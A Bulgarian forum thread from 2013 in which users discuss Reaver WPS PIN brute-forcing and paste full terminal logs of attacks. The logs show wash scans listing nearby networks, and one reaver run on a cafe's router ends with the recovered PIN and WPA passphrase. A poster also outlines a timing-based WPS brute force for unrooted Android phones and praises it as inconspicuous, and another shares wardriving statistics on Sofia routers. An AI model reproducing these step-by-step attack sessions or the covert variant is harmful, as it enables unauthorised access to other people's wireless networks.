Автор Тема: За reaver из темата „Free distributed WPA PSK cracker“  (Прочетена 19320 пъти)

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #15 -: Apr 21, 2013, 10:41 »
Цитат
Напълно си прав,това е някакъв бъг,който reaver има,независимо от версията.Пробвах като стартирам raver и като заключи WPS,веднага стартирам от друг терминал aireplay-ng за handshake,въпреки че успявам да получа handshake,% не мърдат от 0,единствено трика е да се рестартира рутера,но поне аз не знам досега да може рестартира рутер дистанционно.

Защото няма никаква връзка между двете. Това което правиш с Reaver е "активна" bruteforce атака върху WPS PIN-а на рутера. Тя налага да си в обхвата на рутера. Това което правиш с aircrack-ng е "пасивна" атака, опитваш се намериш passphrase-а, който "пасва" на предварително изслухтян authentication handshake, последното може да го правиш и на другия край на света. В пасивната атака може да има и "активен" елемент - реализиран от aireplay-ng, който се ползва за инжектиране на deauth фреймове в мрежата, което кара някой вече автентициран клиент да се разкачи с евентуалната надежда че ще се автентицира след това, ще му изслухтиш handshake-а и ще си го разбиваш на спокойствие.

Между двете обаче има много малко общо. Процентите не мърдат от 0%, просто защото WPS е изключен. Какво правиш в друг терминал с aireplay-ng няма никакво отношение към Reaver, deauth-ването на клиенти на мрежата по никакъв начин няма как да накара Reaver да заработи. Ако рестартираш рутера и Reaver изведнъж проработи отново, това означава единствено че настройката за забрана на WPS не е запазена поради някаква причина и след рестарта, WPS отново е разрешен.

Между другото, в момента си пиша едно app-че за андроид, което map-ва wifi рутери на една карта, ползвайки GPS-а за локация и опитвайки се да събере максимално много информация за рутерите, които "вижда" (android е малко крив в това отношение - колко информация ти се дава и колко не можеш да вземеш, защото няма как да вкараш wifi чипа в monitor mode и да слухтиш фреймове като хората), обаче примерно дали се подържа WPS е елементарно да се разбере. Тествам си го, разхождайки се из София. Имам вече доста статистически наблюдения - потресаващо много рутери подържат WPS, вероятно над 80% от разните домашни рутери, които съм засичал, това е просто глупаво. Другият момент е колко рядко се използва EAP вместо PSK - досега съм виждал само 3 "локации" с EAP автентикация, вместо preshared key - единият е на Oriflame на 4-ти километър, другият е на някаква фирма близо до Ялта, третият беше до НДК, пак на някаква фирма. Предполагам в бизнеспарка ще има повече. Потресаващото е че на разни министерства, дори рутерите на народното събрание работят с PSK. Разбира се, "фирмените" и "правителствените" рутери много рядко имат WPS активиран от друга страна.

Хм, между другото не знам кой е инсталирал и настройвал 802.11 рутерите в Орифлейм, но трябва да си призная, че поне отстрани изглежда като най-професионалното нещо, което съм засичал досега в моите разходки-тестове досега. Личи си по детайлите - имат няколко рутера Cisco с EAP автентикация, един и същ SSID и в ESS режим, с включен preauthentication (за безпроблемно roam-ване между access point-овете) и подържат само и единствено CCMP, а не онези малоумни mixed TKIP+CCMP режими които едно време използваха заради това че Win XP не подържаше първоначално WPA2, а после - и те не знаят защо. Защо тая парфюмерия е инвестирала толкова усилия в wifi мрежата си за разлика от по-големи фирми или министерства примерно, където би трябвало най-малкото да държат повече на сигурността, не знам, засега е загадка :)
« Последна редакция: Apr 21, 2013, 10:58 от gat3way »
Активен

"Knowledge is power" - France is Bacon

Odido

  • Напреднали
  • *****
  • Публикации: 627
  • Distribution: Arch Linux
  • Window Manager: Gnome
    • Профил
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #16 -: Apr 21, 2013, 11:40 »
Според мен са попаднали на човек ,който наистина разбира и е още не стъпил на пазара на услугите или не се е утвърдил,затова и може да е бил с по-достъпни цени
.Всъщност ривъва и еъкрака имат малко повече общо едно с друго ,това е пускането на мониторинг режима и използване на еъркрака,  като външна програма за  асоциация с мрежата (което не е задължително).Впрочем преди доста време ми се стори, че в документацията им мярках иструмент алфа версия още ,подобен на сегашния ривър...
Активен

"Congratulations, you broke the Internet
Look at what you did! Are you happy now?"

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #17 -: Apr 21, 2013, 11:56 »
Не съм сигурен дали въобще е необходимо картата да е в Monitor mode за целите на самото WPS брутфорсване - тъй като комуникацията е само unicast фреймове, които са предназначени за теб така или иначе. Разбира се за да знаеш какво ще хакваш там се налага да вкараш картата в monitor mode, най-малкото за да видиш какви мрежи има в обхвата и за да вземеш BSSID-а който ти трябва. На теория обаче би трябвало ако с iwconfig настроиш канала и SSID-а на мрежата, да можеш да ползваш wlan интерфейса вместо mon интерфейса за експериментите с Reaver. Хм не знам, може би трябва да пробвам.

Апропо, ако това се окаже вярно, вероятно може да се реализира reaver-подобна атака и с андроид, въпреки че там ще е малко по-сложно, защото няма как да знаеш дали си получил NACK след пращане на първата половина от PIN-а или след пращането на втората. Предполагам обаче че може да сравниш времето за (не)успешно автентициране в мрежата и ако отнеме повече време, значи си уцелил първата част и е време за изтестване на втората. Това обаче е малко ненадеждно - защото различни фактори влияят на латентността и може да се окаже че е отнело повече време просто защото някой е затворил някой прозорец примерно. Но пък идеята да имаш reaver на телефона си, при това без да се налага да го root-ваш, е забавна.
« Последна редакция: Apr 21, 2013, 12:04 от gat3way »
Активен

"Knowledge is power" - France is Bacon

anrydisappear

  • Участници
  • ***
  • Публикации: 9
    • Профил
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #18 -: Apr 21, 2013, 12:59 »
Здравей Gat3way,не искам да навлизам в бурни дебати относно reaver,но ...
Цитат
оргинално публикувано от Gat3way
Тя налага да си в обхвата на рутера
логично
Цитат
оргинално публикувано от Gat3way
Процентите не мърдат от 0%, просто защото WPS е изключен
Грешка,ако е изключен WPS,няма как да го видиш в мониторинг режим,камо ли да предава пакети.Пак повтярям това е бъг на reaver,след стартиране на атаката,след приема на около 15%,просто изписва надписа rate "limiting detected" ако сте стартирали атаката с опцията -vv
Прилагам и обяснение от самият автор,ето линк  http://code.google.com/p/reaver-wps/wiki/FAQ  със особено внимание под надписа:
I get a warning "rate limiting detected", over and over again=lock wps
Относно reaver съм си правил доста експерменти,пробвал съм със всички опции но до ден дешен това с заключен wps,няма лек,Битуват разни мнения,че ако се стартират няколко вида атаки по 1 цел "рутер" рутера накрая се рестартира,оприличават го като атака със спам или sms bomb при който устройство се преторварва от исканите заявки,и се рестатира само с цел нормализиране на работата си.Преди време четох мисля че беше твое менение Gat3way,относно предаване и утройство на рутери,доколкото помня всичко беше основано на математика и на някакви случайни числа(дано да не бъркам,изпита по математика си го взимах като пълних бутилката с газ на преподавателката за моя сметка)тъй-като повечето софт(security testing) който е сътворен от девлоперите е основан на тази прословута математика,повтарям възможно да се рестартира рутера сам,но аз поне не съм го видял на живо.
Цитат
оргинално публикувано от Gat3way
защото няма как да вкараш wifi чипа в monitor mode и да слухтиш фреймове като хората
Мисля че затова са виновни хората създали ядрото(кернела) на дроида,между другото дроид е най-куцият тел.за изпълнение на такива хватки
Цитат
оргинално публикувано от Gat3way
Но пък идеята да имаш reaver на телефона си, при това без да се налага да го root-ваш, е забавна
Аз имам този софт близо година и половина на моят тел.(нокиа н900),давам ви пример какво представлява под н900:
~ $ sudo gainroot
Root shell enabled


BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user # cd MyDocs/wl1251-maemo/binary/compat-wireless/
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.sh
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit~ $ root
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# airmon-ng start wlan0


Interface Chipset Driver

wlan0 TI WL1251 wl12xx - [phy0]sleep: invalid number '1s'

(monitor mode enabled on mon0)

Nokia-N900:~# wash -i mon0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
70:71:BC:1B:A4:02 1 -82 1.0 N 5f6abc
00:11:6B:47:58:2A 1 -90 1.0 N Webster
^C
Nokia-N900:~# reaver -i mon0 -b 70:71:BC:1B:A4:02 -d 0
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Waiting for beacon from 70:71:BC:1B:A4:02
  • Associated with 70:71:BC:1B:A4:02 (ESSID: 5f6abc)
  • 0.01% complete @ 2012-02-29 11:38:56 {46 second(s)/pin}
  • 0.01% complete @ 2012-02-29 11:39:23 {73 second(s)/pin}
  • 0.01% complete @ 2012-02-29 11:39:53 {103 second(s)/pin}
  • 0.01% complete @ 2012-02-29 11:40:19 {129 second(s)/pin}
  • 90.91% complete @ 2012-02-29 11:41:03 {86 second(s)/pin}
  • 90.93% complete @ 2012-02-29 11:41:34 {51 second(s)/pin}
  • 90.93% complete @ 2012-02-29 11:42:02 {58 second(s)/pin}
  • 90.94% complete @ 2012-02-29 11:42:32 {52 second(s)/pin}
  • 90.95% complete @ 2012-02-29 11:42:57 {47 second(s)/pin}
  • 90.95% complete @ 2012-02-29 11:43:28 {45 second(s)/pin}
  • WPS PIN: '12345670'
  • WPA PSK: '227490756'
  • AP SSID: '5f6abc'
Nokia-N900:~#

Атаката е направих,в Пловдив в кафето до ПУ,не помня как се казваше но беше на 2 етажа
Цитат
оргинално публикувано от Gat3way
можеш да ползваш wlan интерфейса вместо mon интерфейса за експериментите с Reaver
Става но по принцип reaver е настроена да работи с интерфейс mon0,осезателна разлика няма

« Последна редакция: Apr 21, 2013, 13:12 от anrydisappear »
Активен

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #19 -: Apr 21, 2013, 14:54 »
Цитат
Грешка,ако е изключен WPS,няма как да го видиш в мониторинг режим,камо ли да предава пакети.Пак повтярям това е бъг на reaver,след стартиране на

Това не е вярно. WPS е просто механизъм за автентикация и няма общо с това да се вижда ли или да не се вижда. Wifi точките се виждат, защото периодично "излъчват" т.нар "beacon frame" (офтопик, "скритите" не го излъчват). Примерно моят домашен рутер въобще не подържа WPS и по тази логика не би трябвало да се вижда. Когато изключиш WPS-а на рутера, съвсем спокойно ще си продължи да работи и да се вижда, просто WPS няма да работи. Обаче мисля, че ти имаш предвид това което ти вади "wash". Да, там няма да се види - защото то ти изкарва само АП-тата, които подръжат WPS, останалите се игнорират (reaver така или иначе не може да работи срещу тях).


Цитат
Пак повтярям това е бъг на reaver,след стартиране на атаката,след приема на около 15%,просто изписва надписа rate "limiting detected" ако сте стартирали атаката с опцията -vv

Причината е обяснена в документацията, към която си пратил линк. Забраняването на WPS по време на атаката апропо има същият ефект, по разбираеми причини - просто няма кой да ти "отговаря" повече. Reaver няма как да направи разлика между това дали рутера те е отрязал заради прекалено много опити за единица време (rate limiting) или защото му е забранен WPS по време на атаката - за него и двете изглеждат по един и същ начин.

Цитат
Мисля че затова са виновни хората създали ядрото(кернела) на дроида,между другото дроид е най-куцият тел.за изпълнение на такива хватки

Вярно е, а и допълнително е вярно че дори да бяха по-читави драйверите в андроидското ядро, ако нямаш root права, трудно ще направиш каквото и да било. Има custom rom-ове, които решават подобни проблеми, но това не е толкова приятно. Все пак има начин - дори без да root-ваш телефона, стига да имаш USB OTG подръжка (всички нови телефони/таблети го подържат), OTG кабел и USB wifi адаптер, който е с realtek-ски чипсет - едни пичове са хванали и са пренаписали целия realtek-ски драйвер в userspace, използвайки достъпната USB функционалност на андроида - и там могат да вкарат външното wifi в monitor mode и да слухтят трафик и да го запазват в pcap формат. Още не съм го изтествал - засега имам OTG кабела, но не съм си взел USB wifi адаптера.


Цитат
Става но по принцип reaver е настроена да работи с интерфейс mon0,осезателна разлика няма

Ще съм много задължен ако направиш един експеримент и споделиш резултата: след като вземеш BSSID-тата с wash, забрани monitor mode-a (airmon-ng stop mon0) и пробвай пак с reaver. Така ще сме напълно сигурни че monitor mode не трябва за WPS атаката с reaver, което би било добра новина :)

Активен

"Knowledge is power" - France is Bacon

Odido

  • Напреднали
  • *****
  • Публикации: 627
  • Distribution: Arch Linux
  • Window Manager: Gnome
    • Профил
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #20 -: Apr 21, 2013, 15:28 »
Код:
root@box-desktop:~# apt-get install reaver
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  reaver
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 236 kB of archives.
After this operation, 714 kB of additional disk space will be used.
Get:1 http://bg.archive.ubuntu.com/ubuntu/ quantal/universe reaver amd64 1.4-2 [236 kB]
Fetched 236 kB in 0s (336 kB/s)
Selecting previously unselected package reaver.
(Reading database ... 145607 files and directories currently installed.)
Unpacking reaver (from .../reaver_1.4-2_amd64.deb) ...
Processing triggers for man-db ...
Setting up reaver (1.4-2) ...
root@box-desktop:~# iwlist wlan0 scan
wlan0     Scan completed :
          Cell 01 - Address: A0:F3:C1:37:D1:D8
                    Channel:11
                    Frequency:2.462 GHz (Channel 11)
                    Quality=67/70  Signal level=-43 dBm 
                    Encryption key:on
                    ESSID:"NIKOLACH"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=0000000012768d80
                    Extra: Last beacon: 248ms ago
                    IE: Unknown: 00084E494B4F4C414348
                    IE: Unknown: 010882848B960C121824
                    IE: Unknown: 03010B
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (2) : CCMP TKIP
                        Authentication Suites (1) : PSK
                    IE: WPA Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (2) : CCMP TKIP
                        Authentication Suites (1) : PSK
                    IE: Unknown: 2A0100
                    IE: Unknown: 32043048606C
                    IE: Unknown: DD180050F2020101860003A4000027A4000042435E0062322F00
                    IE: Unknown: DD1E00904C33CE111BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: 2D1ACE111BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: DD1A00904C340B071900000000000000000000000000000000000000
                    IE: Unknown: 3D160B071900000000000000000000000000000000000000
                    IE: Unknown: DD0900037F01010000FF7F
                    IE: Unknown: DD0A00037F04010000004000

По принцип излизат над 40 мрежи но тази е тестваната успешно с mon0....
Резултата с wlan0 интерфейс е нулев,за разлика от aircrack-ng ,с който спокойно можеш да взимаш handshake и с wlan0 и да сваляш wep (тествано от мен)
Код:
root@box-desktop:~# reaver -i wlan0 -b B0:48:7A:CE:79:D4 -c 11 -vv 

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0 to channel 11
[+] Waiting for beacon from B0:48:7A:CE:79:D4
^C
[+] Nothing done, nothing to save.
root@box-desktop:~#
Активен

"Congratulations, you broke the Internet
Look at what you did! Are you happy now?"

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #21 -: Apr 21, 2013, 15:59 »
Жалко :(
Активен

"Knowledge is power" - France is Bacon

anrydisappear

  • Участници
  • ***
  • Публикации: 9
    • Профил
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #22 -: Apr 21, 2013, 16:30 »
Цитат
оргинално публикувано от Gat3way
 Обаче мисля, че ти имаш предвид това което ти вади "wash". Да, там няма да се види - защото то ти изкарва само АП-тата, които подръжат WPS, останалите се игнорират (reaver така или иначе не може да работи срещу тях).
Да,това имах предвид
Цитат
оргинално публикувано от Gat3way
Reaver няма как да направи разлика между това дали рутера те е отрязал заради прекалено много опити за единица време (rate limiting) или защото му е забранен WPS по време на атаката - за него и двете изглеждат по един и същ начин
.
Прав си,но това ме навежда на мисълта че рутера може сам да се сезира когато го атaкуват което ми звучи абсурдно,не вярвам да има такъв рутер,или поне аз не съм срещал такъв
Цитат
оргинално публикувано от Gat3way
Вярно е, а и допълнително е вярно че дори да бяха по-читави драйверите в андроидското ядро, ако нямаш root права, трудно ще направиш каквото и да било. Има custom rom-ове, които решават подобни проблеми, но това не е толкова приятно. Все пак има начин - дори без да root-ваш телефона, стига да имаш USB OTG подръжка (всички нови телефони/таблети го подържат), OTG кабел и USB wifi адаптер, който е с realtek-ски чипсет - едни пичове са хванали и са пренаписали целия realtek-ски драйвер в userspace, използвайки достъпната USB функционалност на андроида - и там могат да вкарат външното wifi в monitor mode и да слухтят трафик и да го запазват в pcap формат. Още не съм го изтествал - засега имам OTG кабела, но не съм си взел USB wifi адаптера
.
Не знам,за 1 път го чувам това,дали обаче като стартираш външen USB wifi адаптер,чрез usb port,кернела ти ще може да работи в мониторинг режим,аз не съм много надълбоко в linux world,но така мисля
Цитат
оргинално публикувано от Gat3way
Ще съм много задължен ако направиш един експеримент и споделиш резултата: след като вземеш BSSID-тата с wash, забрани monitor mode-a (airmon-ng stop mon0) и пробвай пак с reaver. Така ще сме напълно сигурни че monitor mode не трябва за WPS атаката с reaver, което би било добра новина
Няма как да пробвам от pc(сестра ми се бори на живот и смърт за нейният лаптоп,моят сдаде багажа сега се оглеждам за друг),а и колегата го е направил вече,но от тел.мога:

по твоят вариант:
BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ cd MyDocs/wl1251-maemo/binary/compat-wireless/
~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot
Root shell enabled


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.s
h
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit
~/MyDocs/wl1251-maemo/binary/compat-wireless $ root


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# airmon-ng start wlan0
BusyBox v1.21.0 (Debian 1.21.0power2) multi-call binary.

Usage: ps

Show list of processes

w Wide output
l Long output
T Show threads



Interface Chipset Driver

wlan0 TI WL1251 wl12xx - [phy0]
(monitor mode enabled on mon0)

Nokia-N900:~# wash -i mon0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
64:70:02:B6:51:08 6 -83 1.0 No Cvetarski magazin GULCHE
28:10:7B:ED:68:DC 11 -71 1.0 No su
F8:D1:11:41:2F:3C 6 -88 1.0 No setfani
^C
Nokia-N900:~# airmon-ng stop mon0


Interface Chipset Driver

wlan0 TI WL1251 wl12xx - [phy0]
mon0 TI WL1251 wl12xx - [phy0] (removed)

Nokia-N900:~# reaver -i wlan0 -b 64:70:02:B6:51:08 -d 0

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[-] Failed to initialize interface 'wlan0'
[-] Failed to recover WPA key

в monitor mode wlan0:
Nokia-N900:~# exit
~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot
Root shell enabled


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh unload
.sh
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit
~/MyDocs/wl1251-maemo/binary/compat-wireless $ root


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# ifconfig wlan0 down
Nokia-N900:~# iwconfig wlan0 mode Monitor
Nokia-N900:~# ifconfig wlan0 up
Nokia-N900:~# wash -i wlan0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
64:70:02:B6:51:08 6 -83 1.0 No Cvetarski magazin GULCHE
F8:D1:11:41:2F:3C 6 -88 1.0 No setfani
74:EA:3A:C5:A4:F4 9 -85 1.0 No TP-LINK_Blizoo
28:10:7B:ED:68:DC 11 -72 1.0 No su
00:11:6B:47:66:C6 11 -91 1.0 No WBR-6002
^C
Nokia-N900:~# reaver -i wlan0 -b 64:70:02:B6:51:08 -d 0

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session for 64:70:02:B6:51:08? [n/Y] n
  • Waiting for beacon from 64:70:02:B6:51:08
  • [!] WARNING: Failed to associate with 64:70:02:B6:51:08 (ESSID: Cvetarski magazin GULCHE)
    ^C
    това е нормално защото спрях wireless drivers

    без никакъв мониторинг режим,просто с super user:
    Nokia-N900:~# exit
    ~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot
    Root shell enabled


    BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.s
    h
    /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit
    ~/MyDocs/wl1251-maemo/binary/compat-wireless $ root


    BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    Nokia-N900:~# wash -i wlan0 -C -s

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <
cheffner@tacnetsol.com>

[X] ERROR: Failed to open 'wlan0' for capturing
Nokia-N900:~#
« Последна редакция: Apr 21, 2013, 16:32 от anrydisappear »
Активен

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #23 -: Apr 21, 2013, 16:48 »
Цитат
Прав си,но това ме навежда на мисълта че рутера може сам да се сезира когато го атaкуват което ми звучи абсурдно,не вярвам да има такъв рутер,или поне аз не съм срещал такъв

Ъммм, не, правят го някои, по-новите и по-хубавите де. Това обаче е лоша идея - единствено забавя лошите. Единственият начин да се отърве човек от тези глупости е просто да не ползва WPS.

Цитат
Не знам,за 1 път го чувам това,дали обаче като стартираш външen USB wifi адаптер,чрез usb port,кернела ти ще може да работи в мониторинг режим,аз не съм много надълбоко в linux world,но така мисля

Може, стига да му се прати каквото трябва. Тук обаче не става въпрос за ioctl()-та за които kernel-а ще те бие през ръцете че не си root или пък просто не са имплементирани в драйвера. Това е дълга история обаче. Усилията които са положили хората са големи и е похвално че са го споделили. Това е проекта:

http://bryce-thomas.blogspot.com.au/2012/10/introducing-liber80211.html

Активен

"Knowledge is power" - France is Bacon

Odido

  • Напреднали
  • *****
  • Публикации: 627
  • Distribution: Arch Linux
  • Window Manager: Gnome
    • Профил
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #24 -: Apr 21, 2013, 17:54 »
Ммм ,тънък момент...
Код:
Nokia-N900:~# iwconfig wlan0 mode Monitor
Активен

"Congratulations, you broke the Internet
Look at what you did! Are you happy now?"

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #25 -: Apr 21, 2013, 23:45 »
Хм, въпреки което не виждам защо трябва да е задължително да се чака за beacon в началото. Предполагам reaver го прави, защото няма друг начин да валидира че зададеното BSSID е истинско преди началото на атаката. Колкото повече мисля по въпроса, толкова по-убеден съм че е възможно да се реализира WPS bruteforce без да се налага да влизаш в monitor mode (невъзможно с android или поне не лесно). Алгоритъма, който ми се върти из главата е следния:

1) Итерирай първата половина от WPS кода (0000-9999), като за всеки опит смяташ времето t за опита.  Сметни средно-аритметичното t за всяка итерация.
2) Ако на поредния опит нямаш отклонение над някакъв threshold, върви на 1)
3) Изпробвай няколко пъти WPS кода, който дава отклонение над threshold-а, сметни средното време, изпробвай няколко пъти код с друга първа половина, сметни средното време, ако има съществено разминаване над threshold2, най-вероятно първата половина е позната. Ако не - върви на 1)
4)..6) Същите стъпки 1)-3) с вече фиксирана първа половина от WPS кода докато разбием WPS pin-a (демек автентицираме се успешно)

Проблемите тук са че за разлика от Reaver, ние няма как да знаем точно какъв е отговора от access point-а, така че сигурност нямаме, разчитаме на разлики в timing-а. От ключово значение е как си определяме threshold стойностите и върху това трябва да се проработи повече. Това е и причината тук да нямаме гаранция за успех, за разлика от Reaver.

Рутери като например Netgear-ските, които слагат rate limit на WPS опитите също трябва да се вземат под внимание.

Като цяло обаче не ми се вижда толкова невъзможно. Хубавото на цялата работа е че не буди никакво подозрение, тоест ако човек си цъка на телефона разни работи никой няма да си помисли, че троши wifi мрежата. Ако обаче видиш същия с лаптоп с грейнал airdump-ng примерно, определено е притеснително :)

А,да, ще се надпреварваме с батерията - в смисъл не се знае дали батерията ще падне първа или WPS кода. Моята програмка примерно разказва играта на nexus-а само за около 2-3 часа само от постоянно сканиране на близките wifi мрежи и вземане на локацията от GPS-а през 2 секунди :) Но пък би било забавно въпреки всичкото :)
« Последна редакция: Apr 21, 2013, 23:52 от gat3way »
Активен

"Knowledge is power" - France is Bacon

anrydisappear

  • Участници
  • ***
  • Публикации: 9
    • Профил
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #26 -: Apr 22, 2013, 09:33 »
Здравей Gat3way,колкото можах прочетох с моят оскъден english твоят линк,наистина похвално е че този човек,е направил това с този куц кон(dorid),но както казва самият той софта му е много ранна фаза,и споменава че на кадъра които е постнал не се забелязва monitor mode,мисля че ако се намери достатъчно поддръжници(donors)това което би искал да види като завършена весия на неговият софт ще бъде направено.Относно това което казваш за reaver e доста новаторско,досега никой не е споменавал за този вариант,не знам дали ще се полчи под python,защото python разполога с ресурс да изчислява  доста бързо,иначе е страшно ефектно с 1 тел.както си запяш небрежно и му вземаш паролата(wep),говоря от личен опит.Не е зле да качиш твойта програма в google play,да видиш отзивите,за батерията и хакването в повечето случай специално за reaver,батерията не може да дочака заветният момент на появяването на дългоочакваната парола.
Цитат
оргинално публикувано от ApucTokpaT
Ммм ,тънък момент...
Това пък за какво...
Цитат
оргинално публикувано от  Gat3way
Рутери като например Netgear-ските, които слагат rate limit на WPS опитите също трябва да се вземат под внимание
.
Да си чувал тази екстра дали я има под tp-link

 
Активен

Odido

  • Напреднали
  • *****
  • Публикации: 627
  • Distribution: Arch Linux
  • Window Manager: Gnome
    • Профил
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #27 -: Apr 22, 2013, 10:03 »
 TP-link са най-уязвими от към wps атаки -не създават никакви проблеми.В последно време обаче се напълни с мрежи на m-tel ,с които имам 0 % успеваемост интересува ме някой дали може да даде качествен линк с хардуера ,който използват ,благодаря предварително! 
Активен

"Congratulations, you broke the Internet
Look at what you did! Are you happy now?"

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #28 -: Apr 22, 2013, 10:16 »
Няма как да "види" Probe frame-овете без да е в monitor mode :)

А иначе далеч не съм експерт по wifi рутерите и не знам кой рутер rate limit-ва WPS и кой не. Всъщност, дори не знам кои точно Netgear-ски модели го правят и кои - не, просто съм забелязвал такова поведение. Доколкото чета не е някаква конфигурационна опция, с други думи очевидно винаги го прави когато WPS е включен. Що се отнася до TP-LINK наистина нямам идея дали се прави и кой модел от рутерите им евентуално го прави.

Ако някой случайно има Netgear и го е разцъквал, предполагам може да сподели повече информация по въпроса.
Активен

"Knowledge is power" - France is Bacon

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: За reaver из темата „Free distributed WPA PSK cracker“
« Отговор #29 -: Apr 24, 2013, 19:57 »
Между другото, ако на някой му е интересно малко статистика....не е особено представителна извадка, в общи линии Манастирски Ливади+малка част от центъра+част от Редута и Младост 1, горе-долу това:

http://www.gat3way.eu/poc/wifix/s_6.png


Това е разбивка в проценти колко са отворени, колко са с WEP, WPA, WPA2 или mixed mode (WPA/WPA2):

http://www.gat3way.eu/poc/wifix/s_5.png


WPA-специфична диаграма - TKIP vs CCMP vs TKIP+CCMP:

http://www.gat3way.eu/poc/wifix/s_4.png


По производител на рутера:

http://www.gat3way.eu/poc/wifix/s_3.png


Включена WPS подръжка:

http://www.gat3way.eu/poc/wifix/s_1.png


Като се помотам още, ще събера повече данни :)
Активен

"Knowledge is power" - France is Bacon

Подобни теми
Заглавие Започната от Отговора Прегледи Последна публикация
free CAD софуер
Настройка на програми
stoyanovs 1 2872 Последна публикация Sep 28, 2005, 20:46
от Йордан
Distributed System Programming
Предлагане
TheButcher 0 2601 Последна публикация Dec 05, 2005, 03:32
от TheButcher
Shadow cracker
Кошче
skuller 0 2109 Последна публикация Jan 07, 2007, 11:43
от skuller
Free distributed WPA PSK cracker
Системна Сигурност
RealEnder 20 15311 Последна публикация Jan 19, 2012, 23:28
от gat3way
ПРЕМЕСТЕНО: За reaver из темата „Free distributed WPA PSK cracker“
Системна Сигурност
bop_bop_mara 0 1737 Последна публикация Apr 18, 2013, 17:26
от bop_bop_mara